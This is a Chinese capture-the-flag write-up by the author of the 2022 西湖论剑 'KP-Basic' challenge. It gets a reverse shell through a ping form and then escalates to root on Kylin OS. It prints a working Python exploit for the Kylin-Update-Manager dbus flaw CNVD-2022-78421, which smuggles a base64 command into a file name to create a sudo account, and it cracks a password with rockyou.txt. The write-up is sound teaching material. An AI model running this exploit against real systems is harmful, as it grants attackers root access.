西湖论剑2022-MISC KP-Basic的解题思路
2023-10-29 18:39:46 Author: www.zhaoj.in(查看原文) 阅读量:5 收藏

继续朝花夕拾,把自己出的题的解题思路发一份在这里存着。

知识点

1.银河麒麟系统特性

2.银河麒麟系统提权

解题步骤

1.打开是这样一个界面,可以对指定的 IP 地址发起 ping。

2.抓取请求,注入命令,反弹 Shell。

3.尝试执行自定义脚本,未果,推测有拦截。

4.则尝试用 dbus 提权,审计 Kylin-Update-Manager 的源码,可以发现这个漏洞 https://www.cnvd.org.cn/flaw/show/CNVD-2022-78421 还没修。

则 spawn 一个终端出来。

python3 执行下面的脚本。

from pathlib import Path


import dbus
import base64
from pathlib import Path

command = "adduser fakeadmin && adduser fakeadmin sudo && echo 'fakeadmin:Bb123***'|chpasswd"
command_base64 = base64.b64encode(command.encode()).decode()
path = '/tmp/`echo ' + command_base64 + '|base64 -d|sh`'
Path(path).touch()

bus = dbus.SystemBus()
remote_object = bus.get_object("cn.kylinos.KylinUpdateManager", "/cn/kylinos/KylinUpdateManager")
remote_object.install_snap(path, dbus_interface="cn.kylinos.KylinUpdateManager")
print("Command executed!")

直接全部粘进去让它执行。

5.接下来就可以 su fakeadmin, 然后就可以用 Bb123*** 这个密码登录,然后就可以sudo su 提权到root。

然后就可以修改 glzjin 的密码了。

6.然后接下来切换到 glzjin 用户,启动 vncserver。

7.然后开启文件保险箱,初始化失败。

8.需要想办法把vncserver的父进程id挂到当前系统登录的session里,可以用快捷方式+开机启动项操作。

9.重启,再连接,即可打开文件保险箱。

10.使用rockyou.txt 密码尝试,尝试到大概三百个左右时 “maganda” 这个密码可行,打开即可看到flag。

后记

比赛时候有一个非预期解,是直接拿WPS的缓存读到这个文档了,失算失算:)


文章来源: https://www.zhaoj.in/read-8864.html
如有侵权请联系:admin#unsafe.sh